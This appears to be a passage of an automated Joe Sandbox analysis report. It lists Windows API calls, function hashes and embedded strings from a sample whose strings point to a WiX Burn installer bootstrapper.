• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                            • Opcode ID: cb7c634c22bbef44db974bb26047aba889c84df8fc9d64e390d1e6d1681f14f1
                                                                                                                                                                                                                                                                            • Instruction ID: 0f4ce1b06cfb35bd724bbe83438c45e3cc44ea1df7d9eb95d061f0b9418ff69a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb7c634c22bbef44db974bb26047aba889c84df8fc9d64e390d1e6d1681f14f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9D24871E086298FDB65CE28DD407EAB7B9FB88305F1545EAD40DE7240E778AE818F41
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,.unverified,?), ref: 008FE7D8
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,?,?,*.*,?,?,?,.unverified,?), ref: 008FE871
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,*.*,?,?,?,.unverified,?), ref: 008FE880
                                                                                                                                                                                                                                                                              • Part of subcall function 008E5C81: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 008E5CE9
                                                                                                                                                                                                                                                                              • Part of subcall function 008E5C81: GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5CF4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseErrorFirstLastNext
                                                                                                                                                                                                                                                                            • String ID: *.*$.unverified
                                                                                                                                                                                                                                                                            • API String ID: 3458812364-2528915496
                                                                                                                                                                                                                                                                            • Opcode ID: e0ffb4bbd3bddfe35868cb224f160acc4f6ddbdf8b049eccd26e0baf843480ce
                                                                                                                                                                                                                                                                            • Instruction ID: 278cdf6b4f1e72fb2b780bb26f0b06ae56439b0b3b4ed79498d7bdd1b58c0f12
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0ffb4bbd3bddfe35868cb224f160acc4f6ddbdf8b049eccd26e0baf843480ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64419A71A1026DAADB20BF65DC49BFE77B8FF44745F1001A5FA08E60B0E6709E84DB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastNameUser
                                                                                                                                                                                                                                                                            • String ID: Failed to get the user name.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2054405381-561454448
                                                                                                                                                                                                                                                                            • Opcode ID: ff2cc25f1dd210e556e654dc520f7847b0960c99560be4cba8f4acd99afd43d3
                                                                                                                                                                                                                                                                            • Instruction ID: f04d28e296b3a893eb6e65c0be31c52d8de888dab77003eab7d73f1d9b1c7401
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff2cc25f1dd210e556e654dc520f7847b0960c99560be4cba8f4acd99afd43d3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF1104B2A4032876DB20D6569C4AFAF72ACEB42B94F110155FD84F72C2E6A09D4486E0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to check if "ALL" was set in IGNOREDEPENDENCIES., xrefs: 009015A3
                                                                                                                                                                                                                                                                            • Failed to add the package provider key "%ls" to the planned list., xrefs: 0090186D
                                                                                                                                                                                                                                                                            • Failed to check the dictionary of ignored dependents., xrefs: 00901711
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 0090156F, 0090187F
                                                                                                                                                                                                                                                                            • ALL, xrefs: 00901581
                                                                                                                                                                                                                                                                            • Failed to build the list of ignored dependents., xrefs: 0090155D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ALL$Failed to add the package provider key "%ls" to the planned list.$Failed to build the list of ignored dependents.$Failed to check if "ALL" was set in IGNOREDEPENDENCIES.$Failed to check the dictionary of ignored dependents.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-71972248
                                                                                                                                                                                                                                                                            • Opcode ID: c22ea1186e31a39b0dfa782114d9893761b37441b77986feab193f499ae68ce8
                                                                                                                                                                                                                                                                            • Instruction ID: 10509e33962427b5b7a58f1e602fa61802eb6e9e33cad22b5738b25d8738d215
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c22ea1186e31a39b0dfa782114d9893761b37441b77986feab193f499ae68ce8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1C1A870900704DFEB24CFA5C885FAAB7F9FF98315F14852EE50AAB2A1D7719981CB10
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0000000C), ref: 0094BA96
                                                                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,0000000C,?), ref: 0094BAA8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 0094BA7F
                                                                                                                                                                                                                                                                            • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0094BAF3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                                                                                                                            • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
                                                                                                                                                                                                                                                                            • API String ID: 1772835396-395410266
                                                                                                                                                                                                                                                                            • Opcode ID: 27c07312173726553f114cc58a77f45219460a715064a85db1e080dc6b8e5745
                                                                                                                                                                                                                                                                            • Instruction ID: e744d9dc6c4d9727fdb5e30f0955b0025552c9bdd36780a258a683f6ff358002
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27c07312173726553f114cc58a77f45219460a715064a85db1e080dc6b8e5745
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921DAA6900128AADB20DF999C05FBFB3FDEB4D711F04455AB945D6180E638AE80D771
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00919898,00000000,00000003), ref: 00919910
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00919898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?), ref: 0091991A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ChangeConfigErrorLastService
                                                                                                                                                                                                                                                                            • String ID: Failed to set service start type.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1456623077-1893245463
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0094C546
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 0094C561
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 401686933-2746444292
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 008E6313
                                                                                                                                                                                                                                                                              • Part of subcall function 008E6305: GetLastError.KERNEL32(?,008FED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 008E6321
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FED2D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed create acquisition folder., xrefs: 008FED04
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FED16
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateDecryptDirectoryErrorFileLast
                                                                                                                                                                                                                                                                            • String ID: Failed create acquisition folder.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4153065963-4185204549
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0092D4E6
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0092D4F0
                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0092D4FD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,feclient.dll,?,00000008,?,?,00939393,0094E878,?,00000008,?,?,00938F96,00000000), ref: 009395C5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                            • String ID: feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 3997070919-3074931424
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B523: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0093B4C2,?), ref: 0093B5EF
                                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0093B4E6
                                                                                                                                                                                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0093B4F7
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2114926846-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(008E6DEA,?,008E6DEA,008E6DEA,00000000), ref: 00943476
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00943482
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0092726B
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00047150,009268C5), ref: 00927147
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9753846ddebddcf70c29ed45b5f0f3f7ebcd499c9048406afb54d123a0a00179
                                                                                                                                                                                                                                                                            • Instruction ID: d04a3267a62ac2871b690bee63e0f74932e3f9143a0d256dca6601616613cfa7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9753846ddebddcf70c29ed45b5f0f3f7ebcd499c9048406afb54d123a0a00179
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 31c81ea08619909c6322d62b5e957f97260132f134e6dfb16b0fb80343a7b8f4
                                                                                                                                                                                                                                                                            • Instruction ID: 9e80358fa90fc8afae3413cef157a38a0479164d59a6c87f2a766193f13fe606
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31c81ea08619909c6322d62b5e957f97260132f134e6dfb16b0fb80343a7b8f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0B13870A01B0AABDB24EF79D885BDAB7E9FF04305F15482DE4AA97651C774F880CB50
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                                                                                                                                            • Instruction ID: 5f37a8337b1dc293f5ffde99fb1e90dbbd61af5b8b096c9782ec68a2dfb1d018
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF410432B9422C8ADF2ECE3D85796F6369AF781304F24843DE943926E9D531D9C3CA00
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,0096EC58,000000FF,?,?,?), ref: 00949914
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 00949956
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 0094999B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 009499E0
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00949A25
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00949A6A
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 00949AA7
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00949AE4
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,link,000000FF), ref: 00949B3E
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00949B88
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00949D3A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Compare$Free
